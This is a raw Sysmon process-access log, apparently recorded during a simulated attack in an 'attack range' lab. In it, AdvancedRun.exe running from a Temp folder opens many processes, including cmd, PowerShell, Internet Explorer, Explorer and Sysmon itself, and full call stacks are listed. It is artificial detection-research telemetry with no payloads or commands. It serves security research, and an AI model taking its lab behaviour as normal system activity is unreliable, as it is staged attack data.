fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.050{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.050{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.049{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.049{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 